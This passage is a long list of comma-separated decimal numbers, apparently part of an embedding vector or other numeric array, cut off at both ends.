895,-0.020932866,0.011291073,0.00023109435,0.053045064,0.0071181175,0.0080147935,-0.0050349934,-0.004239993,-0.010668965,0.016630111,-0.03154174,0.027568774,-0.012221988,0.003075258,-0.02264542,0.030641606,-0.0050768466,0.0032417844,-0.010440876,0.0045608357,0.013750677,-0.025277253,-0.0032313832,0.0026290792,0.004271193,0.017901853,0.013517269,-0.006022815,0.030741736,0.012373123,0.0072027724,0.0036164762,-0.006127893,-0.0135635715,-0.010106194,-0.028994579,-0.0006300754,0.018180547,0.008844286,-0.012785088,0.02203775,-0.021582184,-0.011465857,-0.015328647,0.012651743,-0.011837735,-0.022382928,-0.0039014383,-0.0068428824,-0.0054952633,0.011907162,-0.027365528,-0.026572965,0.016649533,0.008314052,-0.0034588508,-0.0071943193,-0.019539256,-0.0162882,-0.0073095495,-0.012968138,-0.031921573,-0.019176384,0.031559158,-0.0019541841,0.011337746,-0.000788066,-0.015965099,-0.0015072057,0.032260325,0.00949718,0.013240525,-0.0013630259,-0.009211137,0.0009930813,0.0419651,0.011124227,-0.023231808,-0.01928027,0.0038824922,-0.0031118002,-0.022613794,0.0009976351,-0.0023203131,0.04512305,0.0074221473,-0.019517718,-0.009827963,-0.012435842,-0.017814612,0.01775607,-0.030535316,0.008958356,-0.012000736,-0.0023744116,-0.012708264,0.03857704,-0.024068426,0.031523224,0.020566484,0.018837461,0.0111778965,-0.023987373,0.00891366,0.013799148,0.01304965,0.00022094391,-0.030723838,-0.024470137,0.0323663,-0.0036142846,0.013811001,0.0055485135,-0.014294482,-0.0126943,-0.023320004,0.007676331,0.010861894,-0.004161637,0.015750105,-0.047443904,0.02900076,0.0045799585,0.012969849,0.02701897,0.005309982,-0.021484671,0.008607532,0.006359583,-0.026319036,-0.026358979,0.020019926,-0.015926136,0.001353413,-0.007769954,-0.023427306,-0.03880748,0.0027457438,0.00282565,0.014357458,0.020056168,-0.00869263,-0.0025825526,0.0003690883,0.0054861563,0.0054178936,0.00048794915,-0.026937997,-0.014393177,0.0015761618,-0.0064628166,0.0071122134,0.008060404,-0.005526754,0.0379864,-0.0088431975,-0.013418141,0.014766279,-0.018170603,-0.021031756,-0.0133080315,-0.005446571,-0.010134062,-0.019422727,-0.0021922553,0.00018534313,0.011958146,0.025054283,0.0016441796,0.0055171438,0.0030891295,-0.011039902,-0.0120475665,0.0007039925,0.026248178,-0.01729417,-0.011784485,0.0036289336,-0.015440823,-0.008492429,0.00967702,0.012611688,0.013353609,0.031803176,-0.015842058,-0.019105464,-0.023299543,-0.031280603,-0.0048307297,-0.023192912,0.003708016,-0.0046880017,-0.002557912,0.014726094,0.013991612,0.0005202346,-0.01858577,0.00838957,-0.013942637,0.0039445967,0.003221189,-0.009783771,-0.014236771,-0.0064648353,0.015597839,-0.040977187,0.008681163,-0.009390543,-0.0040308116,0.009627332,-0.018201146,0.008826372,0.00021643405,0.0016610259,0.02336814,0.02012611,-0.019393798,-0.01441557,0.01895728,0.017934266,0.010409897,0.007614414,-0.02252655,0.031477593,-0.0021876756,0.025048025,0.022292063,0.036653724,-0.017392233,-0.009599863,0.005469718,-0.023024164,0.009554701,0.006143527,0.008127307,0.010065923,0.030934963,-0.0025444846,0.022532005,-0.020586243,-0.012722814,0.022965686,-0.017273746,-0.010446976,-0.01737449,0.036396943,0.01594344,-0.0045891223,0.0112798605,0.0009107358,-0.0692155,0.017459324,-0.0028972328,0.0076354826,-0.0058489772,0.0075097163,-0.017154353,0.018832373,0.019705178,-0.029443162,0.025525043,-0.0017657739,-0.0027833472,-0.0049665156,0.009749242,-0.025403338,-0.02262713,0.01957746,0.012446588,0.003776941,-0.009054253,-0.016541798,0.004552993,0.0062598637,0.01530519,-0.021347962,0.013895102,-0.027257664,-0.028005578,0.023417037,0.004517488,0.018707776,-0.0052579716,-0.012975951,-0.0016378561,-0.016178368,0.007309207,0.037231717,-0.016279567,-0.0015913985,-0.010790259,-0.005303794,-0.02062141,0.030784363,-0.012345433,-0.013788307,-0.0011759978,-0.009688152,-0.0130213825,-0.009860497,0.010563565,0.00027490064,0.007726447,0.013435245,0.022530118,0.021715667,0.0024589074,-0.025439074,0.0011652204,0.0073191337,0.011519415,0.0060527646,-0.027181204,-0.009835995,-0.031855356,-0.022037065,-0.0059689544,0.009113527,-0.000070439106,-0.025910476,-0.027447527,0.0076359212,-0.017036699,0.007262096,0.0003076668,0.028740443,0.004869346,-0.0007077451,-0.004739663,-0.0010315218,-0.0118953595,-0.011829026,-0.018147161,0.0060832305,-0.017075775,0.00046216944,0.0022071837,0.0076415725,0.008061307,-0.0069217766,0.008936743,-0.009448737,-0.034346282,0.0025618018,0.016404549,0.027483715,0.012427523,0.00869096,0.019425925,0.007091418,0.017888974,-0.018758936,-0.008087339,0.053508982,-0.018710634,0.00044549064,0.012559611,0.010818344,0.020988919,0.0389815,-0.022478066,-0.017429847,0.001261794,0.013012161,0.025224853,-0.021962883,0.00033488352,0.0047410866,0.04173211,0.0018666058,0.023538064,-0.009103489,0.009180033,0.001113469,0.00920861,0.01956442,0.024792658,-0.006228004,-0.029399874,0.017283842,-0.008356212,0.03319493,-0.008491288,-0.0050863503,0.0069083073,-0.00955567,-0.001302473,-0.010135815,-0.00078042306,-0.0039448896,-0.009602336,0.0013517255,-0.017684313,0.023845091,0.0074989228,-0.015806789,-0.005228216,0.0063659446,0.0019626308,0.0020949692,0.0059566256,0.00034336682,0.008138047,-0.0060790665,-0.0055555273,0.012152955,0.00069659576,-0.011342198,0.00593116,0.012171356,-0.027838705,-0.014550915,0.009210335,-0.011190323,-0.03645505,-0.0048668715,-0.009365284,0.011869897,-0.03223844,-0.009422526,0.0076591372,-0.003994615,-0.0016648356,0.015044279,0.021371247,-0.030814946,0.009963218,0.0044289064,-0.0048121097,-0.012132254,0.0222882,0.022809366,0.005709365,0.008225154,0.009603414,-0.010131226,-0.008747711,-0.00883625,-0.045260943,0.0051206667,-0.022441538,0.012336566,0.007940584,0.015767274,-0.01562595,0.0067297774,0.014798519,0.013315766,0.0048201485,0.006783799,-0.013484166,0.012796912,0.018888175,0.0029895152,-0.0076666567,-0.0021266087,0.009479282,-0.03249903,-0.0066052666,-0.016286127,-0.028566197,-0.006147029,0.0048120194,0.014460642,-0.013394601,-0.014998623,-0.019894997,0.004750727,0.020375157,-0.021893116,0.020409198,-0.009338713,0.017955152,0.00294775,-0.0055821324,-0.0028126019,0.018179744,-0.0064699855,0.0021887668,0.010119645,0.010052228,-0.022644345,0.029650271,0.029673612,-0.016392533,0.0056367554,-0.013445743,0.005079367,-0.014136219,-0.0025008027,0.010366575,-0.00025453718,0.002301407,0.0028128366,0.001942162,0.039735615,-0.0029448352,0.0059374897,0.020135185,0.002877037,0.0069057955,-0.0076007987,-0.0030776244,-0.0046412293,-0.00743307,0.012728964,0.010993077,0.004314369,-0.009444612,-0.020633245,-0.0027460493,-0.003325491,-0.0043289764,0.005613606,0.012626014,0.003849645,0.021659479,-0.0027043526,-0.009728692,-0.00948287,0.0013241397,-0.008459312,0.0019957102,0.0018900874,-0.0135861365,0.003293474,-0.015544125,0.014168569,0.010970164,0.016460406,0.02189242,-0.0029713153,0.0067913183,-0.04243395,-0.00030142633,0.026208375,-0.0013595483,-0.02305372,0.014615093,-0.013776736,0.0014677446,-0.010561812,0.0013643957,0.025090024,0.006296138,-0.005318883,0.0166524,-0.0011264593,0.005802528,-0.017904557,0.050391156,-0.0106685385,0.005605688,-0.015835268,0.007250468,-0.020086816,0.009754662,0.016361943,-0.012131672,-0.0008202084,-0.032468013,-0.026125884,-0.0013295439,-0.04366419,0.0035894704,-0.013998912,-0.008912865,0.00052797963,-0.0013820279,0.030057065,-0.0038770342,-0.009168624,-0.0026084017,0.005240601,-0.0018821674,0.013146558,0.019231886,-0.0048273876,0.0072657764,-0.0038846037,-0.011608725,-0.0024171856,-0.00743194,0.033058807,-0.012506657,0.014199114,-0.011223767,-0.019006195,-0.030272974,0.0037253483,-0.011137707,-0.011532102,0.06442262,-0.01729332,-0.005507519,0.0021746734,0.003337161,-0.011815236,0.010452087,0.0015237675,0.022045342,0.007970648,-0.01427812,0.011953278,-0.013893972,0.024491062,-0.014467546,0.014496171,-0.005819447,0.0035652854,0.005558252,-0.009766763,-0.006915586,0.0039810813,-0.019544816,-0.019932497,0.018883882,-0.020143677,0.006179902,-0.03902014,-0.0115934955,-0.00191972,-0.016263008,-0.021196192,-0.0020022772,-0.010923794,0.02870662,-0.021345943,0.0019835297,0.004892212,-0.0037745526,-0.0027167287,0.034722786,0.011771097,-0.0038819513,0.0062039657,0.020926327,-0.014235808,0.09915366,0.029943394,0.013798526,-0.010753312,-0.0020352437,0.00952222,-0.005406175,0.019404707,-0.0047607394,0.0069753337,-0.0015198631,0.015139911,-0.009958122,0.0033181056,0.0015564047,0.0035674204,-0.012989409,-0.0018669891,0.01799024,-0.02562125,0.0014549191,-0.0025499116,-0.0016134633,-0.019191876,0.01982935,0.006712886,0.00607095,-0.015495182,0.0104635805,-0.030223785,-0.010812732,-0.00048044842,0.002510822,-0.008600439,0.000268611,-0.049709726,-0.0022297036,0.169248,0.010764678,-0.00007294437,0.0096904375,-0.0018801232,-0.0008417454,-0.09256528,0.0059077293,-0.00766829,-0.00191823,0.00059913594,-0.018419918,-0.0044621215,0.028688094,0.009572019,0.004356805,-0.0085563315,-0.024490956,0.013339334,-0.015015963,0.0041326946,0.013130928,0.0067093596,0.011516369,-0.03351296,-0.0057947724,0.0220924,-0.018244114,-0.017551411,-0.0049728826,0.015597056,0.011283974,0.009988888,0.0021174361,-0.0075469445,0.0006038331,0.008297724,-0.006543587,-0.008112044,-0.012334598,0.009002065,0.00895743,-0.014728651,-0.027887827,-0.1646842,-0.013234407,-0.011869754,-0.025476325,0.015272662,0.006682683,0.0027241474,-0.020077055,0.004369362,0.007571849,-0.008525778,0.0025651753,0.009042817,0.020206103,0.015864806,0.0022137894,0.003900183,-0.0013201232,0.009757581,0.0012367594,0.016406855,0.015633706,-0.030090861,-0.024888717,0.0033896477,-0.0060066776,-0.006404725,0.020317368,-0.008508059,0.009186367,-0.017961616,0.018854935,-0.010636972,0.02174583,-0.0032673832,-0.013386085,-0.02358554,0.01531085,-0.025032947,0.00087294466,-0.0115305595,-0.007072968,0.004164082,-0.006943153,0.0052012266,0.029477162,-0.0056724455,0.016515143,0.012620289,0.004431981,0.031333137,0.013579569,-0.035752706,0.02568241,0.007746291,0.010712928,-0.010060519,-0.024238937,-0.03058843,0.0126885865,-0.0151917655,-0.0072966274,-0.022390213,-0.01615415,0.010529576,-0.012220626,-0.004257291,-0.024184678,-0.010155072,0.013418462,-0.010838286,0.0021957955,0.016698489,-0.016687576,0.0040789023,0.020981375,-0.01002408,-0.00015373336,0.0030518987,-0.0005782104,-0.0108559765,-0.01923839,-0.0042609856,-0.019559713,-0.01675855,-0.00022521829,-0.013653596,-0.001243045,-0.008749895,0.0072957957,0.0011175551,0.0130467145,0.038654085,0.000098642086,-0.0002369986,0.01191531,0.021808587,0.0036228453,-0.023628077,0.0071224635,0.0058512995,-0.016149865,-0.012271496,0.014739367,-0.020016475,0.01009915,-0.014214726,-0.007772105,-0.009648013,-0.0052558375,-0.011213571,0.0199653,0.01617141,-0.012312711,-0.035320133,-0.02933742,0.020911267,0.017797468,0.020284088,0.0042856433,-0.013171319,-0.024014307,0.001244443,0.019969461,0.036031704,0.0097854575,-0.02559983,-0.00826012,0.0020892366,-0.0021395315,-0.013064535,-0.009409808,0.003954884,-0.003322419,0.018683419,0.008111491,-0.018482326,-0.019730063,-0.03595261,-0.008038191,0.0032424089,-0.009430132,0.0029895145,-0.0134423515,0.012213079,-0.01390707,-0.00040272443,-0.009781915,0.002175154,-0.026558291,-0.003101698,0.03961025,0.0011292553,-0.022929536,-0.0077901105,0.09787756,-0.018948728,-0.0065161767,0.016003137,-0.021617025,0.009434646,0.0029109153,-0.007604213,-0.029625349,-0.04390611,-0.03815226,-0.016076103,-0.002075122,0.01614152,-0.022273563,0.043869916,0.00541663,0.002759672,-0.007675501,-0.0044643506,0.011449845,-0.017158236,-0.013315788,0.022387236,0.020547798,0.0008387095,0.017084518,-0.0064784084,-0.020071017,-0.012070756,-0.0031701694,-0.0033997453,-0.014233027,-0.0066480963,-0.011814013,-0.06427685,-0.006989564,0.014677655,-0.0050374763,0.008083969,0.0124166785,-0.008891265,0.015121754,-0.009703627,-0.0018733736,0.0029595976,-0.011541744,0.015568445,-0.009856424,-0.007459993,-0.0075353845,0.008958305,0.016893743,-0.016498782,-0.009903357,-0.019145945,0.00041700358,-0.008701465,-0.001122982,-0.012962068,0.06280896,-0.011433943,-0.017956812,0.011344532,-0.0064743385,0.023953142,-0.00081982947,0.008473377,0.0009223785,0.029907845,-0.005997,-0.0065283477,-0.010784928,0.023571296,-0.005562069,0.010245521,-0.0100741,-0.0005590552,-0.017661113,-0.009070882,0.017080354,0.004545658,-0.0000989301,0.009734696,-0.019812455,-0.04559029,-0.012739545,0.019278256,-0.025755962,0.020182405,0.010023019,0.0062623085,0.039373044,0.0050213546,0.016331518,-0.0028741993,0.009191753,0.005851645,-0.00010774151,0.00033384148,0.01312192,0.010785943,-0.013772374,-0.01856815,0.0067643574,-0.032558616,0.015936645,-0.0067191757,0.0010291223,-0.041168597,-0.016842488,-0.017795943,0.019922972,-0.0151555585,0.0057947026,0.063341215,-0.021916918,-0.006579534,0.010120176,-0.026421772,-0.014497765,-0.006048963,0.0006360822,-0.017668784,0.012713559,-0.009247175,0.0006616802,0.011829787,-0.022530908,0.023036914,-0.020931717,0.041107472,0.0012939357,0.035422433,0.00440494,-0.02426931,0.0073427935,0.011391793,-0.004419263,0.010627349,-0.008751731,0.011786469,-0.020198055,-0.01753568,-0.008888967,0.0042175343,0.008832696,0.014773822,-0.017811539,0.00702721,-0.021109516,0.016057184,-0.0026582775,-0.013074807,-0.00042464535,0.023142263,-0.016786706,-0.004727058,-0.0036203887,0.0013852048,-0.014680341,0.013083383,0.0031622117,-0.019634385,-0.03216659,0.0014124527,0.02794213,-0.008365259,0.018209105,0.0015741735,0.0016478458,-0.010850011,-0.0012776538,-0.0009951065,-0.02536419,0.0070843715,0.0058584046,-0.0008156862,-0.0086153215,0.01502265,0.010796039,0.013945403,-0.013777336,0.0019650462,0.009543105,-0.0034071717,-0.012257871,0.018936299,-0.009813988,-0.0039925203,-0.0064055664,0.015132448,0.017256537,-0.0194616,-0.015750619,0.008573804,0.022717053,-0.032143157,0.0073109595,-0.0014222523,-0.009108415,0.028722795,-0.01844411,-0.035431243,-0.0048255096,0.013993692,-0.024024623,0.009634926,-0.0021500157,0.0015666779,-0.012701199,0.012376135,-0.005718562,0.007023962,-0.01096455,-0.0076453937,0.011301741,0.012327224,-0.015036495,-0.019732207,-0.005783642,0.0036371723,-0.005202848,0.005096517,-0.03790539,-0.0067463894,-0.010781748,0.10753285,-0.022614904,-0.007638276,0.013798531,0.029725293,0.026013562,-0.005908084,0.013302824,-0.020818733,-0.0032287827,-0.013343536,-0.03754757,-0.009006431,-0.007981114,-0.012176604,0.0019567832,0.011947748,0.0026352697,0.0004184048,0.0177907,-0.0018770165,0.007844997,0.022910664,-0.00354199,0.00040234972,-0.029642684,-0.013136046,0.020405063,-0.02713272,-0.0062005045,-0.013492827,-0.022169108,-0.012718251,-0.013690014,0.004448445,-0.0008461621,0.0009330356,0.013627262,-0.011014843,0.00222879,0.03391053,0.0013404144,-0.0020539914,-0.013295885,-0.012264673,-0.015079835,0.017710784,0.003206143,-0.020568684,0.00032925603,-0.0077945027,0.011943749,-0.001115207,0.009985563,-0.003219203,0.008043603,-0.00035868143,-0.02799529,0.0068196254,0.011795395,0.0004975305,-0.032250755,-0.013554528,-0.020287273,0.019080536,0.025223441,-0.013914842,-0.016109517,0.0003517407,-0.008759319,-0.023201695,0.030840391,0.0052236486,0.01293818,0.0037371921,-0.016076457,0.0040658615,-0.0091992095,0.0057836054,0.019040674,0.0009095865,0.019317048,-0.019756997,-0.009604143,0.00052798126,0.015259264,0.006582516,0.000010382678,0.0011172147,0.012034774,0.012936552,0.0034598948,-0.012859441,-0.01516008,-0.010818151,-0.006454188,-0.0022508714,-0.0094652185,0.006795606,-0.0295585,0.013872901,-0.013050865,-0.0011267401,-0.007777324,-0.003780217,-0.0059649325,-0.14186752,0.019323364,-0.01964107,-0.018834917,0.008585795,-0.0175529,0.011808781,0.060734868,-0.0006894104,-0.06851027,-0.000037616344,0.012994336,0.010292416,-0.0018312932,-0.006895038,0.0138066765,0.0056957663,-0.01142121,-0.011505755,0.020674922,0.016213894,-0.016678872,-0.0053283484,-0.0023166623,-0.006901151,0.015609141,-0.019317433,0.008558148,0.02017927,0.00827053,-0.0019004543,0.00086283375,-0.0026131908,0.023312028,-0.00089994346,-0.0033269112,-0.010024616,-0.011459948,0.0009469079,0.0068717552,0.0015356333,0.0029519307,0.016191147,-0.0013851976,0.0028210317,0.00341638,-0.009490115,0.01839941,0.0011995909,0.021141738,-0.011067709,-0.0023002229,0.009349092,0.005847769,-0.011186879,-0.022788243,-0.01885815,0.0063008284,0.024698636,-0.006486423,-0.007090067,-0.0018647237,-0.0050674463,-0.021513479,0.0115930075,-0.008639086,-0.00499745,-0.0055199517,-0.014649345,-0.0039222767,-0.00083617674,0.0071038785,-0.0043118177,-0.0010603437,-0.006601754,-0.008778986,0.029368738,0.0068592527,-0.016104583,0.017290324,-0.01699949,-0.006692324,-0.00861208,-0.0020884408,-0.0008650827,0.00096508185,-0.011690255,0.012416568,-0.007168668,0.021416673,0.005788808,0.0025880402,-0.0092250295,-0.022769546,-0.015766278,0.009379753,-0.002781885,0.03252113,-0.0024851041,0.0064085317,0.008465299,0.00071292144,-0.017100547,-0.0015134548,-0.12472123,-0.005045053,0.054412287,0.004518238,-0.02260884,0.0009880734,-0.005102268,0.013789235,0.029488012,0.0036113232,-0.0010382743,0.009746293,0.0007449065,0.00342544,-0.0088450685,-0.003911341,-0.042891268,0.004077151,0.015082304,-0.0056869253,0.014513409,-0.008329271,-0.030242525,-0.0060761026,0.006766854,-0.0012625735,0.010355552,0.021672938,0.007889368,-0.018631382,-0.00819717,0.008891871,-0.014049708,-0.002023231,-0.03973983,0.0020008474,0.009160812,-0.0077870768,0.0026654901,0.015979994,0.00718166,-0.0146900425,0.018802235,0.0009053778,0.007543939,-0.0018501945,0.0067605292,0.008600523,0.014515037,0.0044116145,0.015394931,0.0021317748,0.0090022385,0.012429503,-0.0070920493,-0.024783637,0.0046525686,-0.0113826245,-0.014521412,0.015463517,-0.017244997,0.022413757,-0.0028263088,-0.0066104266,0.014139034,0.013919874,-0.01340712,-0.008085364,0.020140193,-0.006273216,-0.01729379,0.009060784,0.011265207,0.004588988,0.02479609,0.019511843,0.0028712149,0.033031315,0.020343278,-0.0065865675,-0.011433468,-0.015713677,-0.0010048485,0.015150645,-0.0011551089,0.011474189,0.0030875946,0.0069170315,-0.012651721,0.027664112,-0.0019987696,0.0090049645,-0.010639492,0.01265135,0.005453096,0.0028508622,0.021859325,0.02090337,-0.009489158,0.0041027074,-0.0155534735,-0.0017204686,-0.008491205,-0.013180151,-0.018983318,-0.0042376383,0.0057401005,0.016205026,-0.0020569558,0.010032242,0.03649078,-0.009627222,-0.026164496,0.0157098,-0.010447456,-0.0010455443,0.005161556,-0.00045829668,0.0046939123,0.024729617,0.0067980266,0.027937472,-0.016180811,-0.024045223,-0.007983426,0.0014388253,-0.010804029,0.010108753,0.014266883,-0.0027503225,0.0020601284,-0.009934826,0.0198785,-0.033788063,-0.011930038,-0.0026855934,-0.003880353,0.0042148316,0.006303218,0.0007448674,0.030903585,-0.0123619195,-0.0059653544,0.0076955357,-0.013709738,-0.0072813933,0.0056145806,0.013326799,-0.0054979245,0.00020608076,-0.00596965,-0.01890595,0.014604546,0.018047772,-0.020214317,0.0015849889,-0.034388002,-0.0035312453,0.028734703,0.0005903331,0.0014742526,-0.0034068127,-0.0009382646,0.0028379986,0.002422522,0.013485548,0.0036842609,-0.0074989293,-0.0061119907,-0.01619651,0.0061204107,0.002759273,0.015203174,-0.033904593,0.013280958,0.027362121,0.019451255,0.041552138,0.023588115,0.022589533,0.026730306,0.00912008,-0.0026106872,0.0049083056,0.03174846,0.0042301463,-0.005531708,-0.0024439727,-0.007180268,-0.0006687878,0.014112745,-0.028689569,-0.018407822,-0.010768318,0.013871533,0.0051548933,-0.009401063,0.013499168,0.02724002,-0.019206267,-0.005009487,0.026326949,0.019491289,-0.009688666,-0.016321564,-0.0063160313,0.0032608055,0.022411715,0.007449832,-0.0011816118,-0.02636725,0.0023135743,-0.0060406025,0.009959657,0.009912062,0.014052892,-0.00995752,-0.025461119,0.04168332,-0.000028222807,-0.004394556,-0.021626761,0.011079142,-0.015909167,0.0032177484,0.008562402,0.028170621,0.0012691938,-0.015977284,0.0058991686,0.004706499,0.019067986,-0.019200834,0.0042343778,0.0030217154,0.0027663957,0.0072464626,-0.015561712,-0.0064552454,0.0028872446,0.0055659176,0.035788897,0.023804517,0.015127388,0.0032967234,0.010174129,0.014835914,0.0039745476,-0.004543874,0.013365207,0.009024002,-0.018909968,0.005950232,-0.003168138,-0.02045527,-0.0041523734,0.024755992,-0.014655914,-0.0066942824,-0.005245748,-0.011788105,-0.01280772,-0.011691986,-0.0062451935,0.0033034508,0.010057519,0.017386965,-0.0583886,0.005116773,-0.0072236443,0.021739472,0.0020622693,0.0053976425,0.0075071165,0.025688065,-0.022434875,-0.013292855,0.005398996,-0.0028144533,0.010442961,0.00768892,-0.013179232,-0.014215351,0.008701821,-0.0026560265,0.0050935005,-0.026509913,-0.0019434389,-0.005095179,-0.0067848396,-0.004390845,-0.01171355,-0.015886605,0.007934095,-0.011117585,0.015561361,0.021688245,-0.0006207428,-0.008875286,-0.008339534,-0.0018857851,-0.0072875516,0.0029014396,0.011268752,0.00021393411,-0.018262759,0.0027080378,0.031142961,0.0004202377,-0.0062493,0.0058979318,0.0071094413,-0.029766006,0.007906642,0.0008462716,-0.0002475564,-0.016134476,0.004025143,-0.013911775,-0.012997503,-0.01006201,-0.027351156,0.014383955,-0.0094488105,0.020334901,0.02910122,0.00012753996,0.0027296513,-0.010301866,0.0072027245,0.028680144,-0.009262858,0.006502107,-0.025107939,0.0046406896,-0.02126381,-0.005701305,0.016647052,0.008218188,0.024939857,-0.00063023454,0.009005044,-0.0059883413,-0.012210973,-0.00039143345,0.0036317136,-0.021982076,-0.010494133,-0.0015758415,0.02095192,0.030612012,0.0048327614,0.0077691027,0.014369565,0.008986721,0.0066851946,-0.018942634,-0.0020774608,-0.00043794033,0.006876746,-0.0025760531,0.011507804,-0.011679593,0.00015246836,0.010518619,-0.0049017747,0.004387975,0.028153807,-0.022015445,0.0042250017,-0.0182585,0.005243336,-0.017391998,-0.0150318425,-0.0041739475,-0.09860592,0.013820761,0.017456783,-0.0009891352,0.019724805,-0.0034251513,-0.01643311,-0.003363549,-0.013677622,0.0064907717,-0.005607913,0.008801002,-0.008079199,0.007552632,0.0071497876,0.008091312,-0.004509837,0.011705382,0.023134297,-0.016303562,-0.00033787335,0.03204436,-0.006866778,-0.0027437455,0.016125185,-0.0027833336,-0.009798068,-0.003637143,0.0063339486,0.012194329,0.00024469814,0.015167667,-0.014060078,-0.011306082,-0.00303502,-0.0016478823,0.01264167,0.022847034,0.0091735115,-0.015154637,0.019767623,0.014190736,0.012138158,-0.015305556,0.0016002138,0.014732157,-0.021810286,-0.024398195,-0.023641072,-0.007948949,0.014369734,0.0014662435,-0.0032182438,0.029634535,-0.005582027,-0.008547237,0.014424405,0.0062050945,0.011921277,0.0030818956,0.0008989449,0.0020807707,0.04148447,-0.008000465,0.0017781722,0.008589154,0.0017443023,0.0048515922,-0.030569497,-0.0055617727,0.019310597,-0.015934372,-0.03355181,0.005412827,-0.010986153,0.010490287,-0.0076763993,-0.0089640925,0.009108891,0.0015651577,0.009647514,0.0062597445,0.003874879,-0.010821581,0.013557066,0.021751516,-0.012925092,0.0126833515,0.023109652,0.0030044292,0.010982371,0.005739227,0.037709318,0.0036172748,0.0101924185,0.013328323,-0.006446891,0.0029768604,-0.000074241034,0.023906069,-0.0048485748,0.0026647248,0.0039953953,-0.00022105091,-0.017012719,-0.0027275188,0.00225603,0.020249227,-0.012662775,0.012218226,-0.007811078,0.01388932,0.02597312,0.0131708,0.011273767,0.0015654486,-0.006539086,0.0027593798,-0.018118104,-0.016229568,-0.027892273,-0.029221773,-0.012526989,-0.0052823946,0.014823406,-0.01139785,0.014051096,-0.013498346,-0.02276341,0.026642585,-0.009791634,0.030055601,0.0054584155,0.01738111,0.010973708,0.018778421,-0.018190349,0.018428229,-0.024970444,-0.002259387,0.0150064295,-0.021188416,0.015375858,0.018041147,-0.0019238574,0.037017707,-0.005079488,-0.0008711144,-0.017712915,-0.021762019,-0.00801195,0.0006861976,0.011947021,-0.01146939,-0.0058830623,-0.014207338,0.028022502,0.008664037,0.0055559636,-0.00067746534,0.013729532,0.014711671,0.014118017,0.005139724,0.0020314942,0.011423221,0.0009487095,0.00061033975,-0.0034759045,-0.01682805,-0.01681573,0.014352528,-0.0037695912,0.013334236,-0.020992309,0.013398982,0.017573712,0.022082405,0.010059565,-0.0046090437,-0.0055206283,-0.0003999134,0.0012476576,0.000102697566,-0.028420657,-0.006322847,-0.006067615,-0.01189371,-0.00568135,-0.007409173,-0.011415977,0.0023277993,0.015184118,-0.013087854,-0.02426781,-0.017214198,0.014562219,-0.0087114405,0.0017266698,0.016024608,-0.016676035,0.010799037,0.0023638213,0.015775545,0.027651908,0.02512155,0.0028745923,0.0010302155,-0.005251198,0.0034885663,0.012926415,0.0110646505,-0.007330409,0.12779185,0.035634875,0.010854858,0.004031205,0.01447664,0.0089856135,0.0140435025,-0.0091629615,0.0055606314,0.005974916,0.011477606,-0.0022729028,0.0020065235,-0.010234649,-0.02433967,0.0061386605,0.008452237,-0.020131378,0.009467073,-0.011742487,-0.008518748,-0.01725127,-0.017007004,-0.035509966,-0.006819146,-0.044889975,0.014094875,0.02981459,-0.017658662,0.027304696,0.020148644,0.008368327,0.009620308,0.0056686257,-0.015228186,-0.011459204,0.004083918,-0.0076783956,-0.010593127,-0.0133456355,0.005407613,0.0136910435,-0.011315531,-0.0075873905,-0.011319932,0.00842734,0.001559421,0.013706508,0.0019415997,-0.010324214,0.010148968,-0.00020077568,0.010649908,-0.007419058,0.036781453,-0.021215668,0.012148599,0.0057351002,0.02321244,0.0055146376,0.015884446,0.0065995674,0.00083019596,0.014683971,0.0066841957,0.003978628,-0.005294119,-0.012960546,-0.018503107,-0.022563715,0.03784978,-0.005048557,-0.00849762,0.00448369,-0.014722493,0.021464173,-0.008141057,-0.027920729,-0.0058809924,-0.009912804,0.0028902479,0.004488809,0.014978529,-0.010846131,0.000859667,0.0018006808,0.011140623,0.031076303,-0.0073182485,0.007656664,-0.0060754055,0.028277503,0.00066743145,0.0022957511,0.00063284097,0.0017642471,0.007844398,-0.00074878416,-0.0039420174,0.0056381603,-0.021253651,-0.002170574,-0.007580811,-0.005022054,-0.008319226,0.0034406628,0.007041515,0.030493474,-0.0137991505,0.0105810575,-0.008772705,0.009424275,0.014153477,0.007881553,-0.0028613731,-0.015056613,-0.0045443107,-0.013165553,0.009194546,-0.017415216,0.0016258408,0.0043316013,0.041603014,0.012151969,0.017334238,0.026390964,-0.013989862,0.009135625,-0.008661184,-0.013059916,0.011590684,-0.060094964,-0.01891574,0.014770432,0.00567631,0.03379995,0.022595163,0.020465553,-0.015338531,-0.0074453987,0.012701786,-0.003217385,-0.0024805034,-0.0013257939,0.012437941,-0.00042414214,0.01832345,-0.0035321768,0.01337253,-0.0071845846,-0.01119515,0.020328913,-0.013261891,0.0048210337,-0.016603917,-0.01412008,0.009227753,-0.0100259045,-0.0018781237,0.005375606,0.0011106192,0.014144451,0.002494131,-0.041123807,0.023231061,0.011851432,-0.006462788,-0.013116365,0.004243665,-0.005276311,-0.006887009,-0.0066830157,-0.015161836,0.017208392,-0.0140608745,-0.007666695,0.01119973,0.0061756684,-0.027570946,-0.0072661107,-0.007407306,0.015104488,-0.009882708,0.004760128,0.013127527,-0.0004455573,-0.0039021668,-0.013934636,0.014037266,0.036979374,0.008208817,0.0016801347,-0.002896603,0.020680966,-0.0032089169,0.00775463,-0.029052721,0.05144095,-0.018731242,-0.026197346,-0.008817561,-0.0057021542,-0.0035149194,-0.0057668765,0.01814905,0.00053261913,0.0067744884,-0.008251656,-0.018282967,0.00615304,0.018937869,0.015353893,-0.0051902127,-0.017107561,-0.006051275,0.01008769,-0.021244546,-0.0150612,-0.024306733,0.0045928117,-0.007805038,-0.009584157,0.00095147744,-0.0071689514,-0.0030307393,-0.019894164,-0.0062622014,0.017808206,-0.001342281,-0.026665282,-0.00044684813,-0.006099666,-0.008106625,-0.006689896,-0.019291101,-0.016040932,0.013427752,0.014073473,-0.011580085,0.009445201,-0.01777693,-0.008119632,0.0047315424,0.012298163,-0.028568212,-0.005632449,0.0017822366,-0.015201281,-0.010060573,-0.028966412,-0.02426808,0.0032595175,-0.027850833,-0.0053746533,-0.022756325,-0.03673546,-0.014777466,0.010066548,0.023241889,-0.0065535945,-0.0064463755,-0.00038754614,0.008261271,-0.008004865,-0.0047748014,0.0037019078,0.011101005,-0.00663852,-0.0022049116,-0.02094639,0.008012554,-0.004001598,-0.022169162,0.014055996,-0.005788487,0.020402266,-0.014065196,-0.025810942,-0.0010122062,0.022201497,-0.013689769,-0.0032193756,0.020172458,-0.01245678,-0.0021387357,0.0072359093,0.009634035,-0.011370984,0.049133822,-0.05248965,-0.010504499,0.03101215,-0.02330287,-0.009430075,0.023093216,-0.021541433,-0.05626919,-0.04366509,0.027554225,0.010881633,0.00083766534,-0.026193393,-0.014601862,0.009142788,-0.022895547,-0